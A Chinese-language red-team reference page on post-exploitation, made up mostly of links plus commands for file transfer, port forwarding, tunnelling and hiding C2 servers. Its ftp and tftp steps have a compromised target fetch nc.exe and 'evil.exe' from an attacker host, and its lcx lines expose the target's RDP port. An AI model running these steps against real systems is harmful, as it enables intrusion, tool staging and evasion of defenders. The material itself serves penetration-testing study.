# 后渗透

---

## 免责声明

`本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.`

---

# 大纲

* **[横向扩展](#横向扩展)**
    * [基于IPC\$的横向](#基于IPC$的横向)
    * [PTH/PTK/PTT](#pthptkptt)
    * [文件传输](#文件传输)
        * [web-servers](#web-servers)
        * [FTP](#ftp)
        * [Linux](#linux)
        * [Win](#win)

* **[隐匿技术](#隐匿技术)**
    * [流量隐藏技术](#流量隐藏技术)
        * [端口转发](#端口转发)
        * [应用层隧道](#应用层隧道)
        * [网络层隧道](#网络层隧道)
        * [代理](#代理)
    * [C2隐藏技术](#c2隐藏技术)
        * [CDN](#cdn)
        * [域前置](#域前置)
        * [重定向](#重定向)
    * [侧信道](#侧信道)

* **[权限提升](#权限提升)**

* **[权限维持](#权限维持)**

* **[windows域](#windows域)**
    * [域认证基础知识](#域认证基础知识)
    * [域内信息收集](#域内信息收集)
    * [Exchange](#exchange)
    * [认证](#认证)
    * [跨域](#跨域)

---

**后渗透案例**
- [记一次渗透测试](https://www.t00ls.net/thread-58322-1-2.html)

---

# 横向扩展

## 基于IPC$的横向

- [IPC\$](../OS安全/Windows安全.md#ipc)

## PTH/PTK/PTT

- [PTH](../OS安全/Windows安全.md#pth)
- [PTT](../OS安全/Windows安全.md#ptt)

---

## 文件传输

**相关文章**
- [红队后渗透测试中的文件传输技巧](https://paper.seebug.org/834/)

### web-servers

**相关工具**
- [sc0tfree/updog](https://github.com/sc0tfree/updog) - 用于替代 Python 的 SimpleHTTPServer 的工具,自带401认证服务
    ```
    pip3 install updog
    updog --port 8888 --password test1234
    ```
- [projectdiscovery/simplehttpserver](https://github.com/projectdiscovery/simplehttpserver) - Go alternative of python SimpleHTTPServer

**本地服务**

以下部分内容来自 部分内容来自 部分内容来自项目 <sup>[[willurd/web-servers.md](https://gist.github.com/willurd/5720255#file-web-servers-md)]</sup>

在当前目录起个 8000 端口的 HTTP 服务

- Python 2.x
    ```bash
    python -m SimpleHTTPServer 8000
    ```

- Python 3.x
    ```bash
    python3 -m http.server 8000 --bind 0.0.0.0
    ```

- Twisted <sub><sup>(Python)</sup></sub>
    ```bash
    twistd -n web -p 8000 --path .
    ```
    or
    ```bash
    python -c 'from twisted.web.server import Site; from twisted.web.static import File; from twisted.internet import reactor; reactor.listenTCP(8000, Site(File("."))); reactor.run()'
    ```

- Ruby
    ```bash
    ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 8000, :DocumentRoot => Dir.pwd).start'
    ```

- Ruby 1.9.2+
    ```bash
    ruby -run -ehttpd . -p8000
    ```

- adsf <sub><sup>(Ruby)</sup></sub>
    ```bash
    gem install adsf   # install dependency
    adsf -p 8000
    ```

- Sinatra <sub><sup>(Ruby)</sup></sub>
    ```bash
    gem install sinatra   # install dependency
    ruby -rsinatra -e'set :public_folder, "."; set :port, 8000'
    ```

- Perl
    ```bash
    cpan HTTP::Server::Brick   # install dependency
    perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>8000); $s->mount("/"=>{path=>"."}); $s->start'
    ```

- Plack <sub><sup>(Perl)</sup></sub>
    ```bash
    cpan Plack   # install dependency
    plackup -MPlack::App::Directory -e 'Plack::App::Directory->new(root=>".");' -p 8000
    ```

- Mojolicious <sub><sup>(Perl)</sup></sub>
    ```bash
    cpan Mojolicious::Lite   # install dependency
    perl -MMojolicious::Lite -MCwd -e 'app->static->paths->[0]=getcwd; app->start' daemon -l http://*:8000
    ```

- http-server <sub><sup>(Node.js)</sup></sub>
    ```bash
    npm install -g http-server   # install dependency
    http-server -p 8000
    ```

- node-static <sub><sup>(Node.js)</sup></sub>
    ```bash
    npm install -g node-static   # install dependency
    static -p 8000
    ```

- PHP <sub><sup>(>= 5.4)</sup></sub>
    ```bash
    php -S 127.0.0.1:8000
    ```

- Erlang
    ```bash
    erl -s inets -eval 'inets:start(httpd,[{server_name,"NAME"},{document_root, "."},{server_root, "."},{port, 8000},{mime_types,[{"html","text/html"},{"htm","text/html"},{"js","text/javascript"},{"css","text/css"},{"gif","image/gif"},{"jpg","image/jpeg"},{"jpeg","image/jpeg"},{"png","image/png"}]}]).'
    ```

- busybox httpd
    ```bash
    busybox httpd -f -p 8000
    ```

- webfs
    ```bash
    webfsd -F -p 8000
    ```

- IIS Express
    ```bash
    C:\> "C:\Program Files (x86)\IIS Express\iisexpress.exe" /path:C:\MyWeb /port:8000
    ```

### FTP

**tftp**

基于 udp,端口为 69

- **攻击端起 tftp**
    ```bash
    mkdir /tftp
    atftpd --daemon --port 69 /tftp
    cp /usr/share/windows-binaries/nc.exe /tftp/
    chown -R nobody /tftp
    ```

- **目标机**
    ```bash
    tftp -i <kali-ip> GET nc.exe
    ```

**ftp**

- **攻击端**
    ```bash
    apt-get install -y pure-ftpd

    groupadd ftpgroup
    useradd -g ftpgroup -d /dev/null -s /etc ftpuser
    pure-pw useradd username -u ftpuser -d /ftphome
    pure-pw mkdb
    cd /etc/pure-ftpd/auth/
    ln -s ../conf/PureDB 60pdb
    mkdir -p /ftphome
    chown -R ftpuser:ftpgroup /ftphome/
    /etc/init.d/pure-ftpd restart
    ./setup-ftp(输入要设置的密码)
    ```

    攻击端使用 python 起 ftp:
    ```
    apt-get install -y python-pyftpdlib
    mkdir /ftp
    cd /ftp/
    python -m pyftpdlib -p 21
    ```
    此时目标机连接的时候,用户名为 anonymous,密码随意

- **目标机**
    目标机的远程 shell 上运行
    ```bash
    echo open <kali-ip> 21> ftp.txt
    echo username>> ftp.txt
    echo password>> ftp.txt
    echo bin >> ftp.txt
    echo GET evil.exe >> ftp.txt
    echo bye >> ftp.txt
    ftp -s:ftp.txt
    ```

    目标机上传文件(连接状态):
    ```bash
    ftp> put target.exe(如果是 windows 且文件在其他盘,需使用绝对路径)
    ```

    关闭 ftp:
    ```bash
    /etc/init.d/pure-ftpd stop
    ```

    windows下
    ```
    ftp
    username
    password
    get file
    exit 或者 bye
    ```
    ```
    ftp -s:test.txt
    ```

### Linux lol

- [Linux LOL](../OS安全/Linux安全.md#lol)

### Win lol

- [Windows LOL](../OS安全/Windows安全.md#lol)

---

# 隐匿技术

## 流量隐藏技术

**相关文章**
- [强制通过VPN上网,VPN断线就断网](https://www.t00ls.net/articles-38739.html)
- [匿名信使：木马隐蔽通信浅谈](https://mp.weixin.qq.com/s/X_qPqmpx6uGAs6Y84rV8Jg)

### 端口转发

端口转发是转发一个网络端口从一个网络节点到另一个网络节点的行为。

**文章**
- [渗透基础——端口转发与代理](https://www.4hou.com/posts/PQMA)

**工具**
- [cw1997/NATBypass](https://github.com/cw1997/NATBypass) - 一款 lcx 在 golang 下的实现
- [knownsec/rtcp](https://github.com/knownsec/rtcp) - 利用 Python 的 Socket 端口转发，用于远程维护
- [k8gege/PortTran](https://github.com/k8gege/PortTran) - .NET 端口转发工具,支持任意权限
- [EarthWorm](http://rootkiter.com/EarthWorm/)
    - [idlefire/ew: 内网穿透(跨平台)](https://github.com/idlefire/ew)
    - [「SOCKS5代理」ew 正向、反向、多级级联](https://ai-sewell.me/2018/SOCKS5%E4%BB%A3%E7%90%86-ew-%E6%AD%A3%E5%90%91-%E5%8F%8D%E5%90%91-%E5%A4%9A%E7%BA%A7%E7%BA%A7%E8%81%94/)
    - [利用 ew 轻松穿透目标多级内网](https://klionsec.github.io/2017/08/05/ew-tunnel/)
- [ph4ntonn/Stowaway](https://github.com/ph4ntonn/Stowaway)

- **lcx**
    ```bash
    lcx -slave 111.222.333.444 4567 127.0.0.1 3389  # On the targets
    lcx -listen 4567 33891                          # Attacker
    ```

- **netcat**
    - **tcp 端口连接**
        ```bash
        smtp: nc -nv 192.168.30.35 25 help
        pop3: nc -nv 192.168.30.35 110 user xxx pass xxx
        imap: nc -nv 192.168.30.35 143
        ```

    - **chat**
        ```bash
        nc -nvlp 4444                               # A 主机
        nc -nv 192.168.30.35 4444                   # B 主机
        ```

- **socat**
    ```
    socat TCP-LISTEN:5000,fork,reuseaddr tcp:127.0.0.1:8080
    ```

**实验**
- [端口转发实验](./实验/端口转发实验.md)

### 隧道

#### 应用层隧道

**ssh**
- [SSH端口转发（本地转发、远程转发、动态转发）](https://www.cnblogs.com/zangfans/p/8848279.html)
- [「端口转发」SSH 隧道](https://ai-sewell.me/2018/%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91-SSH-%E9%9A%A7%E9%81%93/)
- [内网穿透-ssh转发技术](https://mp.weixin.qq.com/s/JgoHWE0Egfi_oSLoOEVwzg)

```bash
ssh -L 8080:127.0.0.1:80 root@192.168.1.7       # 本地转发
ssh -R 8080:127.0.0.1:80 root@192.168.1.7       # 远程转发
ssh -D 1080 root@sshserver                      # 动态端口转发
```

**WEB**
- [sensepost/reGeorg](https://github.com/sensepost/reGeorg)
- [L-codes/Neo-reGeorg](https://github.com/L-codes/Neo-reGeorg)

#### 网络层隧道

**ICMP**
- **文章**
     - [ICMP隐蔽隧道从入门到精通](https://www.anquanke.com/post/id/152046)
     - [内网穿透-ICMP协议](https://mp.weixin.qq.com/s/ZA6NlOg5SXggBLgk7ClUfA)

- **工具**
    - [DhavalKapil/icmptunnel](https://github.com/DhavalKapil/icmptunnel)

### 代理

**相关文章**
- [谈谈我所了解的WEB代理](https://www.freebuf.com/articles/web/181723.html)

**相关利用案例**
- [代理配置不当](../Web安全/Web_Generic/Web_Generic.md#代理配置不当)

**相关资源**
- [zu1k/proxypool](https://github.com/zu1k/proxypool)

**反向代理**
- [frp](https://github.com/fatedier/frp)
    - [frp安装](../../../Integrated/Linux/Power-Linux.md#frp)

---

## C2隐藏技术

**相关文章**
- [利用CDN、域前置、重定向三种技术隐藏C2的区别](https://blog.csdn.net/qq_41874930/article/details/109008708)

### CDN

让 cdn 转发合法的 http 或者 https 流量来达到隐藏的目的。

受害主机上只会有跟 cdn 的 ip 通信的流量，不会有跟真实 C2 通信的流量，可以保护 C2 的 ip，但是域名还是会暴露。

**相关文章**
- [反溯源-cs和msf域名上线](https://xz.aliyun.com/t/5728)
- [使用CDN隐藏c2流量](http://blog.sern.site:8000/2020/08/03/%E4%BD%BF%E7%94%A8CDN%E9%9A%90%E8%97%8Fc2%E6%B5%81%E9%87%8F/)

**实验**
- [CDN+C2实验](./实验/C2实验.md#CDN)

### 域前置

`Domain fronting`

同一个 cdn 厂商下倘若有两个域名 a.com，b.com，这时候我们使用 curl 命令访问第一个 a.com 并将 host 名改为 b.com 这时候，实际访问的是 b.com 的内容。而一般的监测机制是不会检测 host 头的。

通过一个高信任域名隐藏自己的真实域名与 ip，且受害主机上只有跟 cdn 通信的流量。

**相关文章**
- [域前置技术的原理与CS上的实现](https://blog.csdn.net/qq_41874930/article/details/107742843)
- [【安全研究】Domain fronting域名前置网络攻击技术](https://mp.weixin.qq.com/s/aK3-Kofj7HdJ6BKhO3GVZA)

### 重定向

两台 vps，一台做重定向，一台是真正的 C2，而受害者只与那台做重定向的机器通信，重定向机器只会转发来自 beacon 的特定流量到 C2 控制端主机，对于其他流量可以自定义设置处理方法，一般是采用重定向到一些高信誉域名上例如百度等。

受害者上只会有与重定向机器之间的流量，不会有与真实 c2 服务器的流量，重定向服务器会将非 beacon 的请求重定向到一些高信誉域名上，达到迷惑的目的，不过如果受害者 ban 掉了重定向机器的 ip，对攻击者的损失也是很大的。

**相关文章**
- [利用apache mod_rewrite模块实现重定向技术来隐藏CS的teamserver的原理与实现](https://shanfenglan.blog.csdn.net/article/details/107789018)
- [cobaltstrike配置nginx反向代理](https://mp.weixin.qq.com/s/OK0m9lln5-XjHHkWLwMxHg)
- [Cobalt Strike with CloudFlare](https://mp.weixin.qq.com/s/d6hu8YE-SGy-eruIWOwbXg)
- [博客使用Cloudflare和Nginx的相关配置](https://jayshao.com/cloudflare-nginx-ssl/)

**相关项目**
- [cedowens/Mod_Rewrite_Automation](https://github.com/cedowens/Mod_Rewrite_Automation) - Scripts to automate standing up apache2 with mod_rewrite in front of C2 servers.
- [threatexpress/cs2modrewrite](https://github.com/threatexpress/cs2modrewrite) - Convert Cobalt Strike profiles to modrewrite scripts

**实验**
- [重定向+C2实验](./实验/C2实验.md#重定向)

---

## 侧信道

**工具**
- **PTP-RAT**
    - https://www.pentestpartners.com/security-blog/exfiltration-by-encoding-data-in-pixel-colour-values/
    - https://github.com/pentestpartners/PTP-RAT

---

# 权限提升

- [权限提升](./权限提升.md)

---

# 权限维持

- [权限维持](./权限维持.md)

---

# windows域

**域渗透相关文章(总结类)**
- [我所了解的内网渗透——内网渗透知识大总结](https://www.anquanke.com/post/id/92646)

## 域基础知识

**域认证**
- 关于 windows 域认证的基本知识点可见笔记 [认证](../../../../Integrated/Windows/笔记/认证.md#域认证)

**域环境**
- 关于 windows 域环境组成的基本知识点可见笔记 [认证](../../../../Integrated/Windows/笔记/域.md)

**域环境搭建**
- 关于 windows 域认证的基本知识点可见笔记 [认证](../../../../Integrated/Windows/实验/Windows域搭建)

## 域内信息收集

- [域内信息收集](../信息收集/信息收集.md#域信息)

## Exchange

- [Exchange](./实验/Exchange.md)

## 认证

- [认证](../OS安全/Windows安全.md#认证)

## 跨域

![](../../../../../assets/img/才怪.png)
